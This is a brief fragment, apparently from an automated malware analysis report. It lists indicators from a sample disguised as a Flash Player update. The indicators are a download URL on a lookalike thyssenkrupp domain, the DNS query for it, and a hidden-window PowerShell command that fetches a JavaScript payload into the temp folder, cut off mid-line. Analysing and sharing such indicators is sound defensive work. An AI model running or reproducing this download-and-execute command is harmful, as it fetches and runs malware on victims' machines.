Technical Information
- http+s://lai9ethyssenkrupp.com/2529884492450/1526603585189109/flashplayer.jse as $d
- DNS ASK la#####yssenkrupp.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden $d=$env:temp+[char][byte]92+'1611625727928.js';(New-Object System.Net.WebClient).DownloadFile('http'+'s://lai9ethyssenkrupp.com/2529884492450/1526603585189109/FlashPlayer.js...' (with hidden window)